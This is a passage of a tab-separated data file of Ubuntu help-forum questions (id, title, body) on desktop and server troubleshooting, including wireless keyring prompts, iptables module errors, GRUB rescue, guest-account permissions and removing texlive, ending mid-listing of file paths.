//pl.archive.ubuntu.com/ubuntu/ lucid universe deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //pl.archive.ubuntu.com/ubuntu/ lucid multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid multiverse deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates multiverse deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //pl.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //pl.archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main restricted deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe deb http : //security.ubuntu.com/ubuntu lucid-security multiverse deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse maria @ marysia-ubuntu : ~ $ seems changed , but it 's the only thing i can understand . thanks .
28198	how do i automatically connect to a wireless network with auto-login ?	i want networkmanager to automatically connect to the wireless network . i 've configured my account to automatically log in ( using system > administration > login window ) and i get prompted to unlock my gnome keyring . from researching this , it would appear that i should be able to disable the security on the keyring by blanking the password . however , if i change the password of the default keyring to blank so that it uses `` unsafe storage '' and automatically log in , i am prompted with a `` wireless network authentication required '' request . the password field is already filled in but does not seem to have been used . so how do i convince networkmanager and the gnome keyring to work without requiring me to log in with a password , or to enter my keyring password ?
28203	how to import a radio station list from rhythmbox to banshee ?	i want to try banshee on lucid and have to import all my radio station lists , so i wonder how to do this automatically instead of importing each one by hand . i have several radio stations in rhythmbox and the process would be very tiresome . thanks
28206	how do i enable gnome system tools ?	i am running ubuntu 10.04 with gnome 2.30.2 . this is a vmware workstation image provided by another company that i do not have support in this regard . i am trying to access the graphical tools for configuring the network , users , and services but the system- > administration menu does not have these options listed . the main issue i am trying to solve is to correct the problems with the gnome menu options and network settings . i have the gnome-system-tools package installed , and i am unable to run command-line versions of the tools , such as nm-applet ( i get no gui if i run that command , the process is running in the background ) . i realize that i can perform many tasks command-line , but i would like to use the gui for administrative functions as i am not overly proficient for all command for restarting services and setting a static ip with a specific gateway . further , i can run gnome-nettool , but i can not change the ip , i can only see my network card . nm-connection-editor does not show any network cards that i can configure to change the ip . currently , i am getting a dhcp through my nat in vmware , i want to set it to a specific ip address though . preferences menu ( note some missing options ) administration menu ( note some missing options ) network tools ( i can view but not change ip address ) network settings ( unable to change ip address ) network connections ( no connections listed , not even my existing ethernet nat connection through vmware )
28212	ca n't edge scroll on samsung rv510	i installed ubuntu on my samsung rv510 , and i have edge scrolling checked for my touchpad but it simply does n't work . any ideas ?
28215	how can i fix the iptables error message `` unable to initialize table 'filter ' '' ?	when i try to use iptables command on one of my rackspace cloud server , i 'm getting the following error . in an attempt to apply iptables rules with iptables-apply -t 120 /etc/iptables.rules and iptables-restore < /etc/iptables.rules i got the next error : fatal : could not load /lib/modules/2.6.32.4-rscloud/modules.dep : no such file or directory iptables-restore v1.4.4 : iptables-restore : unable to initialize table 'filter' error occurred at line : 2 try `iptables-restore -h ' or 'iptables-restore -- help ' for more information . how do i fix this ? edit 1 : uname -r : 2.6.32.4-rscloud modprobe /lib/modules/ $ ( uname -r ) /kernel/net/ipv4/netfilter/iptable_filter.ko : fatal : could not load /lib/modules/2.6.32.4-rscloud/modules.dep : no such file or directory ls /lib/modules/ $ ( uname -r ) /kernel/net/ipv4/netfilter/ : ls : can not access /lib/modules/2.6.32.4-rscloud/kernel/net/ipv4/netfilter/ : no such file or directory edit 2 : apt-cache search linux-image-* : alsa-base - alsa driver configuration files linux-image-2.6.31-14-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-14-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-14-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-302-ec2 - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-9-rt - linux kernel image for version 2.6.31 on ingo molnar 's full real time preemption patch linux-image-rt - rt linux kernel image rt2400-source - source for rt2400 wireless network driver rt2500-source - source for rt2500 wireless network driver rt2570-source - source for rt2570 wireless network driver linux-image - generic linux kernel image . linux-image-2.6.31-15-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-15-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-15-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-16-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-16-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-16-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-17-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-17-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-17-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-19-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-19-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-19-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-20-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-20-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-20-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-21-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-21-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-21-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-304-ec2 - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-305-ec2 - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-306-ec2 - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-ec2 - linux kernel image for ec2 machines linux-image-generic - generic linux kernel image linux-image-server - linux kernel image on server equipment . linux-image-virtual - linux kernel image for virtual machines linux-image-2.6.31-22-generic - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-22-server - linux kernel image for version 2.6.31 on x86_64 linux-image-2.6.31-22-virtual - linux kernel image for version 2.6.31 on x86/x86_64 linux-image-2.6.31-307-ec2 - linux kernel image for version 2.6.31 on x86/x86_64
28216	setting the python path for the trunk version of django	i am trying to run the unit tests for the trunk version of django . i also have a version of django installed on my system which i installed via apt-get install . how can i change the python path to point to the trunk version of django ?
28221	ubuntu freezes booting up after hibernation	i have a lenovo thinkpad edge 13 ( intel model ) i 've gotten everything to work under ubuntu except for hibernation . the system hibernates normally but when ubuntu tries to boot from the hibernation file , it freezes . i tried with the 2.6.35 kernel and the newer 2.6.36 ( which solved my eating-battery problems ) , but this issue persists . how could i troubleshoot this issue ? edit : my ubuntu install is in a separate partition alongside windows 7 . i 've tried a bios update today , and the problem still persists . my swap partition is bigger than my installed ram ( 2,3gb vs 2,0 gb ) suspend as a sleep method works , but i really need my hibernation option .
28227	not able to run thunderbird 3.3a2	i wanted to try thunderbird 3.3a2 so i downloaded it from the thunderbird website . i extracted it and tried to run both files . however i am getting file can not be executed error . amey @ amey-desktop : ~/documents/thunderbird $ ./thunderbird exec : 398 : ./thunderbird-bin : not found amey @ amey-desktop : ~/documents/thunderbird $ ls -lart thunderbird* -rwxr-xr-x 1 amey amey 48220 2010-01-01 13:30 thunderbird-bin -rwxr-xr-x 1 amey amey 3920 2010-01-01 13:30 thunderbird amey @ amey-desktop : ~/documents/thunderbird $ ls -lart run-mozilla.sh -rwxr-xr-x 1 amey amey 10597 2010-01-01 13:30 run-mozilla.sh what am i missing ? i did also try giving full permission ( 777 ) to all three files , still no luck . tried using sudo too .
28228	videos not playing properly	i am using ubuntu 10.04 . i installed vlc media player and played some videos , but it is not playing properly ... i tried to play them with totem movie player , but it 's also not working properly .
28231	email notification icon for panel	the standard indicator applet 0.4.6 on a fresh install of ubuntu 10.10 does n't achieve what i am looking for . can someone recommend an alternative applet to notify when new emails arrive . it should have the following features : imap support . multiple mailboxes . bonus features : calendar notifications . push imap support . customisable icons & visuals .
28234	is there a hotkey to toggle between the two panes only in nautilus ( with extra pane/f3 mode ) ?	i am running nautilus with the extra pane feature enabled . but i am missing a keyboard shortcut to switch between the left and right pane . is there a shortcut key for toggling just between the left and right file pane ? something that works like tab in total commander/midnight commander ? tab and shift-tab are not what i 'm looking for . they cycle through several other gui elements in addition to the two panes . i 'm on ubuntu 10.04 if that matters .
28238	how do i restrict users ?	i 'm using ubuntu 10.04 . i would like to create a new account , for other people using my computer . i would like my guest to have access to internet , text editor and other application installed on my computer without having access to my data ( and obviously system settings ) . i have added a user `` guest '' using graphic interface ( system - > administration - > users and groups ) . my guest has now access to the application , but not full - wine and virtualbox are empty ( wine has only wine notepad , on virtualbox there is no virtual machine installed ) . internet and chat are fine , but `` guest '' has the access to anything in the computer via terminal , and i would like to keep him in his guests home ( there are a lot of people using my computer , not all of them i know well ) . i have found on http : //www.ubuntu.pl/ how to change user 's privileges via terminal and i 'm wondering if the command chmod -vr -- preserve-root 700 /home/maria is fine ? /home has two directories : guest and maria . and how to ensure for my guest the access to applications installed on wine and virtualbox without installing it once again ? this is an output for guests groups : guest @ marysia-ubuntu : ~ $ groups guest adm dialout fax cdrom floppy tape dip video plugdev fuse nopasswdlogin guest @ marysia-ubuntu : ~ $ and this for marias groups : maria @ marysia-ubuntu : ~ $ groups maria adm dialout cdrom plugdev lpadmin admin sambashare guest maria @ marysia-ubuntu : ~ $
28243	is libunity planning on including functions for unity lenses ?	i am unclear on this , because i have heard mention of a proposed api for unity lenses , and such an api would be extremely useful for projects involving home automation . i am interested in developing in that direction , but i have n't been able to find the api for unity lenses . it would make the most sense of libunity was to include unity lenses because it would put all the functionality of the unity launcher into one place . if libunity is not the api for lenses , does such an api exist , and how would i find it ?
28245	how to redirect output of jobs in background ?	ping6 ipv6.google.com & after i type this in the terminal , the command is ran in the background . however , it stills generate the output to the foreground , and print the result to the terminal . how to make it display the output in the background ?
28250	unknown filesystem with grub rescue caption can not boot	i just recently partitioned my hard drive and i got this error when booting ubuntu on that drive . unknown filesystem followed by the grub rescue terminal . i did some research and tried to download super grub disk but i cant seem to fix it with that . i have two hard disks . one with windows vista on it and the other with ubuntu which is the one i partitioned . there was 100 gb reserved for all the ubuntu partitions that i needed and the rest was split into two partitions , one for backup folders for my windows machine and the other for music production which is the one that i created . the space used to created that was shrunk from my backup partition so i did n't mess with any of the ubuntu partitions . as of now there are a total of 5 partitions . i also downloaded rescatux which is another super grub disk for grub 2 not knowing which grub i had . it still did n't work . in super grub disk i tried to swap the hard disk because that was what was said to do in order to fix the grub , that did n't work it said it was unsuccessful . i even tried to unplug the windows hard disk and run super grub disk and that was n't successful either . is there another way i can fix this ? please any help would be greatly appreciated . i would like to have a nice step by step response .
28253	unable to install on a lenovo v460	i tried installing ubuntu 10.10 on a lenovo v460 . i selected a separate drive for it and also created a swap area , but after the copying of files is over and when it displays `` ready when you are ... '' my laptop hangs . how to solve this ? is this a problem with my laptop ?
28255	is there an equivalent to the compiz expose type plugin for unity ?	i 've been giving 10.10 a spin on my netbook and it comes with unity pre-enabled . are there any equivalents to the plugins i use on full gnome desktop , namely show all windows and show all windows on all workspaces ? i ca n't seem to access anything other than keyboard shortcuts which do n't list those operations .
28256	program for extending the filesystem ?	what program do you recommend me for extending the ubuntu filesystem ( the ext3 partition `` / '' ) ? except for gparted which has to boot from usb stick ... is there any other software that i can try directly ? thanks
28258	how to remove a package entirely ?	i 'm quite new to linux , but before using it i was hearing that windows programs , after uninstallation , leaves a lot of remains on the hard disc , and linux removes all . i 'm using ubuntu 10.04 . to uninstall packages i 'm using sudo apt-get autoremove application_name or sudo aptitude purge application_name . recently i have installed texlive-full and for some reasons i had quickly to uninstall it . after i 've entered to terminal updatedb , then locate *texlive* and the output was very long : maria @ marysia-ubuntu : ~ $ locate *texlive* /etc/texmf/fmt.d/10texlive-base.cnf /etc/texmf/fmt.d/10texlive-formats-extra.cnf /etc/texmf/fmt.d/10texlive-lang-cyrillic.cnf /etc/texmf/fmt.d/10texlive-lang-czechslovak.cnf /etc/texmf/fmt.d/10texlive-lang-polish.cnf /etc/texmf/fmt.d/10texlive-latex-base.cnf /etc/texmf/fmt.d/10texlive-math-extra.cnf /etc/texmf/fmt.d/10texlive-metapost.cnf /etc/texmf/fmt.d/10texlive-omega.cnf /etc/texmf/fmt.d/10texlive-xetex.cnf /etc/texmf/hyphen.d/09texlive-base.cnf /etc/texmf/hyphen.d/10texlive-lang-arabic.cnf /etc/texmf/hyphen.d/10texlive-lang-croatian.cnf /etc/texmf/hyphen.d/10texlive-lang-cyrillic.cnf /etc/texmf/hyphen.d/10texlive-lang-czechslovak.cnf /etc/texmf/hyphen.d/10texlive-lang-danish.cnf /etc/texmf/hyphen.d/10texlive-lang-dutch.cnf /etc/texmf/hyphen.d/10texlive-lang-finnish.cnf /etc/texmf/hyphen.d/10texlive-lang-french.cnf /etc/texmf/hyphen.d/10texlive-lang-german.cnf /etc/texmf/hyphen.d/10texlive-lang-greek.cnf /etc/texmf/hyphen.d/10texlive-lang-hungarian.cnf /etc/texmf/hyphen.d/10texlive-lang-indic.cnf /etc/texmf/hyphen.d/10texlive-lang-italian.cnf /etc/texmf/hyphen.d/10texlive-lang-latin.cnf /etc/texmf/hyphen.d/10texlive-lang-latvian.cnf /etc/texmf/hyphen.d/10texlive-lang-lithuanian.cnf /etc/texmf/hyphen.d/10texlive-lang-mongolian.cnf /etc/texmf/hyphen.d/10texlive-lang-norwegian.cnf /etc/texmf/hyphen.d/10texlive-lang-other.cnf /etc/texmf/hyphen.d/10texlive-lang-polish.cnf /etc/texmf/hyphen.d/10texlive-lang-portuguese.cnf /etc/texmf/hyphen.d/10texlive-lang-spanish.cnf /etc/texmf/hyphen.d/10texlive-lang-swedish.cnf /etc/texmf/hyphen.d/10texlive-lang-ukenglish.cnf /etc/texmf/updmap.d/10texlive-base.cfg /etc/texmf/updmap.d/10texlive-fonts-extra.cfg /etc/texmf/updmap.d/10texlive-fonts-recommended.cfg /etc/texmf/updmap.d/10texlive-games.cfg /etc/texmf/updmap.d/10texlive-lang-african.cfg /etc/texmf/updmap.d/10texlive-lang-arabic.cfg /etc/texmf/updmap.d/10texlive-lang-cyrillic.cfg /etc/texmf/updmap.d/10texlive-lang-czechslovak.cfg /etc/texmf/updmap.d/10texlive-lang-french.cfg /etc/texmf/updmap.d/10texlive-lang-greek.cfg /etc/texmf/updmap.d/10texlive-lang-hebrew.cfg /etc/texmf/updmap.d/10texlive-lang-indic.cfg /etc/texmf/updmap.d/10texlive-lang-lithuanian.cfg /etc/texmf/updmap.d/10texlive-lang-mongolian.cfg /etc/texmf/updmap.d/10texlive-lang-polish.cfg /etc/texmf/updmap.d/10texlive-lang-vietnamese.cfg /etc/texmf/updmap.d/10texlive-latex-base.cfg /etc/texmf/updmap.d/10texlive-latex-extra.cfg /etc/texmf/updmap.d/10texlive-math-extra.cfg /etc/texmf/updmap.d/10texlive-omega.cfg /etc/texmf/updmap.d/10texlive-pictures.cfg /etc/texmf/updmap.d/10texlive-science.cfg /var/cache/apt/archives/texlive-base_2009-7_all.deb /var/cache/apt/archives/texlive-bibtex-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-binaries_2009-5ubuntu0.2_i386.deb /var/cache/apt/archives/texlive-common_2009-7_all.deb /var/cache/apt/archives/texlive-doc-base_2009-2_all.deb /var/cache/apt/archives/texlive-doc-bg_2009-2_all.deb /var/cache/apt/archives/texlive-doc-cs+sk_2009-2_all.deb /var/cache/apt/archives/texlive-doc-de_2009-2_all.deb /var/cache/apt/archives/texlive-doc-en_2009-2_all.deb /var/cache/apt/archives/texlive-doc-es_2009-2_all.deb /var/cache/apt/archives/texlive-doc-fi_2009-2_all.deb /var/cache/apt/archives/texlive-doc-fr_2009-2_all.deb /var/cache/apt/archives/texlive-doc-it_2009-2_all.deb /var/cache/apt/archives/texlive-doc-ja_2009-2_all.deb /var/cache/apt/archives/texlive-doc-ko_2009-2_all.deb /var/cache/apt/archives/texlive-doc-mn_2009-2_all.deb /var/cache/apt/archives/texlive-doc-nl_2009-2_all.deb /var/cache/apt/archives/texlive-doc-pl_2009-2_all.deb /var/cache/apt/archives/texlive-doc-pt_2009-2_all.deb /var/cache/apt/archives/texlive-doc-ru_2009-2_all.deb /var/cache/apt/archives/texlive-doc-si_2009-2_all.deb /var/cache/apt/archives/texlive-doc-th_2009-2_all.deb /var/cache/apt/archives/texlive-doc-tr_2009-2_all.deb /var/cache/apt/archives/texlive-doc-uk_2009-2_all.deb /var/cache/apt/archives/texlive-doc-vi_2009-2_all.deb /var/cache/apt/archives/texlive-doc-zh_2009-2_all.deb /var/cache/apt/archives/texlive-extra-utils_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-font-utils_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-fonts-extra-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-fonts-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-fonts-recommended-doc_2009-7_all.deb /var/cache/apt/archives/texlive-fonts-recommended_2009-7_all.deb /var/cache/apt/archives/texlive-formats-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-full_2009-7_all.deb /var/cache/apt/archives/texlive-games_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-generic-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-generic-recommended_2009-7_all.deb /var/cache/apt/archives/texlive-humanities-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-humanities_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-lang-african_2009-3_all.deb /var/cache/apt/archives/texlive-lang-arabic_2009-3_all.deb /var/cache/apt/archives/texlive-lang-armenian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-croatian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-cyrillic_2009-3_all.deb /var/cache/apt/archives/texlive-lang-czechslovak_2009-3_all.deb /var/cache/apt/archives/texlive-lang-danish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-dutch_2009-3_all.deb /var/cache/apt/archives/texlive-lang-finnish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-french_2009-3_all.deb /var/cache/apt/archives/texlive-lang-german_2009-3_all.deb /var/cache/apt/archives/texlive-lang-greek_2009-3_all.deb /var/cache/apt/archives/texlive-lang-hebrew_2009-3_all.deb /var/cache/apt/archives/texlive-lang-hungarian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-indic_2009-3_all.deb /var/cache/apt/archives/texlive-lang-italian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-latin_2009-3_all.deb /var/cache/apt/archives/texlive-lang-latvian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-lithuanian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-mongolian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-norwegian_2009-3_all.deb /var/cache/apt/archives/texlive-lang-other_2009-3_all.deb /var/cache/apt/archives/texlive-lang-polish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-portuguese_2009-3_all.deb /var/cache/apt/archives/texlive-lang-spanish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-swedish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-tibetan_2009-3_all.deb /var/cache/apt/archives/texlive-lang-ukenglish_2009-3_all.deb /var/cache/apt/archives/texlive-lang-vietnamese_2009-3_all.deb /var/cache/apt/archives/texlive-latex-base-doc_2009-7_all.deb /var/cache/apt/archives/texlive-latex-base_2009-7_all.deb /var/cache/apt/archives/texlive-latex-extra-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-latex-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-latex-recommended-doc_2009-7_all.deb /var/cache/apt/archives/texlive-latex-recommended_2009-7_all.deb /var/cache/apt/archives/texlive-latex3_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-luatex_2009-7_all.deb /var/cache/apt/archives/texlive-math-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-metapost-doc_2009-7_all.deb /var/cache/apt/archives/texlive-metapost_2009-7_all.deb /var/cache/apt/archives/texlive-music_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-omega_2009-7_all.deb /var/cache/apt/archives/texlive-pictures-doc_2009-7_all.deb /var/cache/apt/archives/texlive-pictures_2009-7_all.deb /var/cache/apt/archives/texlive-plain-extra_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-pstricks-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-pstricks_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-publishers-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-publishers_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-science-doc_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-science_2009-7ubuntu3_all.deb /var/cache/apt/archives/texlive-xetex_2009-7_all.deb /var/cache/apt/archives/texlive_2009-7_all.deb /var/lib/dpkg/info/texlive-base.list /var/lib/dpkg/info/texlive-base.postrm /var/lib/dpkg/info/texlive-bibtex-extra.list /var/lib/dpkg/info/texlive-bibtex-extra.postrm /var/lib/dpkg/info/texlive-doc-base.list /var/lib/dpkg/info/texlive-doc-base.postrm /var/lib/dpkg/info/texlive-doc-bg.list /var/lib/dpkg/info/texlive-doc-bg.postrm /var/lib/dpkg/info/texlive-doc-cs+sk.list /var/lib/dpkg/info/texlive-doc-cs+sk.postrm /var/lib/dpkg/info/texlive-doc-de.list /var/lib/dpkg/info/texlive-doc-de.postrm /var/lib/dpkg/info/texlive-doc-en.list /var/lib/dpkg/info/texlive-doc-en.postrm /var/lib/dpkg/info/texlive-doc-es.list /var/lib/dpkg/info/texlive-doc-es.postrm /var/lib/dpkg/info/texlive-doc-fi.list /var/lib/dpkg/info/texlive-doc-fi.postrm /var/lib/dpkg/info/texlive-doc-fr.list /var/lib/dpkg/info/texlive-doc-fr.postrm /var/lib/dpkg/info/texlive-doc-it.list /var/lib/dpkg/info/texlive-doc-it.postrm /var/lib/dpkg/info/texlive-doc-ja.list /var/lib/dpkg/info/texlive-doc-ja.postrm /var/lib/dpkg/info/texlive-doc-ko.list /var/lib/dpkg/info/texlive-doc-ko.postrm /var/lib/dpkg/info/texlive-doc-mn.list /var/lib/dpkg/info/texlive-doc-mn.postrm /var/lib/dpkg/info/texlive-doc-nl.list /var/lib/dpkg/info/texlive-doc-nl.postrm /var/lib/dpkg/info/texlive-doc-pl.list /var/lib/dpkg/info/texlive-doc-pl.postrm /var/lib/dpkg/info/texlive-doc-pt.list /var/lib/dpkg/info/texlive-doc-pt.postrm /var/lib/dpkg/info/texlive-doc-ru.list /var/lib/dpkg/info/texlive-doc-ru.postrm /var/lib/dpkg/info/texlive-doc-si.list /var/lib/dpkg/info/texlive-doc-si.postrm /var/lib/dpkg/info/texlive-doc-th.list /var/lib/dpkg/info/texlive-doc-th.postrm /var/lib/dpkg/info/texlive-doc-tr.list /var/lib/dpkg/info/texlive-doc-tr.postrm /var/lib/dpkg/info/texlive-doc-uk.list /var/lib/dpkg/info/texlive-doc-uk.postrm /var/lib/dpkg/info/texlive-doc-vi.list /var/lib/dpkg/info/texlive-doc-vi.postrm /var/lib/dpkg/info/texlive-doc-zh.list /var/lib/dpkg/info/texlive-doc-zh.postrm /var/lib/dpkg/info/texlive-extra-utils.list /var/lib/dpkg/info/texlive-extra-utils.postrm /var/lib/dpkg/info/texlive-font-utils.list /var/lib/dpkg/info/texlive-font-utils.postrm /var/lib/dpkg/info/texlive-fonts-extra-doc.list /var/lib/dpkg/info/texlive-fonts-extra-doc.postrm /var/lib/dpkg/info/texlive-fonts-extra.list /var/lib/dpkg/info/texlive-fonts-extra.postrm /var/lib/dpkg/info/texlive-fonts-recommended-doc.list /var/lib/dpkg/info/texlive-fonts-recommended-doc.postrm /var/lib/dpkg/info/texlive-fonts-recommended.list /var/lib/dpkg/info/texlive-fonts-recommended.postrm /var/lib/dpkg/info/texlive-formats-extra.list /var/lib/dpkg/info/texlive-formats-extra.postrm /var/lib/dpkg/info/texlive-games.list /var/lib/dpkg/info/texlive-games.postrm /var/lib/dpkg/info/texlive-generic-extra.list /var/lib/dpkg/info/texlive-generic-extra.postrm /var/lib/dpkg/info/texlive-generic-recommended.list /var/lib/dpkg/info/texlive-generic-recommended.postrm /var/lib/dpkg/info/texlive-humanities-doc.list /var/lib/dpkg/info/texlive-humanities-doc.postrm /var/lib/dpkg/info/texlive-humanities.list /var/lib/dpkg/info/texlive-humanities.postrm /var/lib/dpkg/info/texlive-lang-african.list /var/lib/dpkg/info/texlive-lang-african.postrm /var/lib/dpkg/info/texlive-lang-arabic.list /var/lib/dpkg/info/texlive-lang-arabic.postrm /var/lib/dpkg/info/texlive-lang-armenian.list /var/lib/dpkg/info/texlive-lang-armenian.postrm /var/lib/dpkg/info/texlive-lang-croatian.list /var/lib/dpkg/info/texlive-lang-croatian.postrm /var/lib/dpkg/info/texlive-lang-cyrillic.list /var/lib/dpkg/info/texlive-lang-cyrillic.postrm /var/lib/dpkg/info/texlive-lang-czechslovak.list /var/lib/dpkg/info/texlive-lang-czechslovak.postrm /var/lib/dpkg/info/texlive-lang-danish.list /var/lib/dpkg/info/texlive-lang-danish.postrm /var/lib/dpkg/info/texlive-lang-dutch.list /var/lib/dpkg/info/texlive-lang-dutch.postrm /var/lib/dpkg/info/texlive-lang-finnish.list /var/lib/dpkg/info/texlive-lang-finnish.postrm /var/lib/dpkg/info/texlive-lang-french.list /var/lib/dpkg/info/texlive-lang-french.postrm /var/lib/dpkg/info/texlive-lang-german.list /var/lib/dpkg/info/texlive-lang-german.postrm /var/lib/dpkg/info/texlive-lang-greek.list /var/lib/dpkg/info/texlive-lang-greek.postrm /var/lib/dpkg/info/texlive-lang-hebrew.list /var/lib/dpkg/info/texlive-lang-hebrew.postrm /var/lib/dpkg/info/texlive-lang-hungarian.list /var/lib/dpkg/info/texlive-lang-hungarian.postrm /var/lib/dpkg/info/texlive-lang-indic.list /var/lib/dpkg/info/texlive-lang-indic.postrm /var/lib/dpkg/info/texlive-lang-italian.list /var/lib/dpkg/info/texlive-lang-italian.postrm /var/lib/dpkg/info/texlive-lang-latin.list /var/lib/dpkg/info/texlive-lang-latin.postrm /var/lib/dpkg/info/texlive-lang-latvian.list /var/lib/dpkg/info/texlive-lang-latvian.postrm /var/lib/dpkg/info/texlive-lang-lithuanian.list /var/lib/dpkg/info/texlive-lang-lithuanian.postrm /var/lib/dpkg/info/texlive-lang-mongolian.list /var/lib/dpkg/info/texlive-lang-mongolian.postrm /var/lib/dpkg/info/texlive-lang-norwegian.list /var/lib/dpkg/info/texlive-lang-norwegian.postrm /var/lib/dpkg/info/texlive-lang-other.list /var/lib/dpkg/info/texlive-lang-other.postrm /var/lib/dpkg/info/texlive-lang-polish.list /var/lib/dpkg/info/texlive-lang-polish.postrm /var/lib/dpkg/info/texlive-lang-portuguese.list /var/lib/dpkg/info/texlive-lang-portuguese.postrm /var/lib/dpkg/info/texlive-lang-spanish.list /var/lib/dpkg/info/texlive-lang-spanish.postrm /var/lib/dpkg/info/texlive-lang-swedish.list /var/lib/dpkg/info/texlive-lang-swedish.postrm /var/lib/dpkg/info/texlive-lang-tibetan.list /var/lib/dpkg/info/texlive-lang-tibetan.postrm /var/lib/dpkg/info/texlive-lang-ukenglish.list /var/lib/dpkg/info/texlive-lang-ukenglish.postrm /var/lib/dpkg/info/texlive-lang-vietnamese.list /var/lib/dpkg/info/texlive-lang-vietnamese.postrm /var/lib/dpkg/info/texlive-latex-base-doc.list /var/lib/dpkg/info/texlive-latex-base-doc.postrm /var/lib/dpkg/info/texlive-latex-base.list /var/lib/dpkg/info/texlive-latex-base.postrm /var/lib/dpkg/info/texlive-latex-extra-doc.list /var/lib/dpkg/info/texlive-latex-extra-doc.postrm /var/lib/dpkg/info/texlive-latex-extra.list /var/lib/dpkg/info/texlive-latex-extra.postrm /var/lib/dpkg/info/texlive-latex-recommended-doc.list /var/lib/dpkg/info/texlive-latex-recommended-doc.postrm /var/lib/dpkg/info/texlive-latex-recommended.list /var/lib/dpkg/info/texlive-latex-recommended.postrm /var/lib/dpkg/info/texlive-latex3.list /var/lib/dpkg/info/texlive-latex3.postrm /var/lib/dpkg/info/texlive-luatex.list /var/lib/dpkg/info/texlive-luatex.postrm /var/lib/dpkg/info/texlive-math-extra.list /var/lib/dpkg/info/texlive-math-extra.postrm /var/lib/dpkg/info/texlive-metapost-doc.list /var/lib/dpkg/info/texlive-metapost-doc.postrm /var/lib/dpkg/info/texlive-metapost.list /var/lib/dpkg/info/texlive-metapost.postrm /var/lib/dpkg/info/texlive-music.list /var/lib/dpkg/info/texlive-music.postrm /var/lib/dpkg/info/texlive-omega.list /var/lib/dpkg/info/texlive-omega.postrm 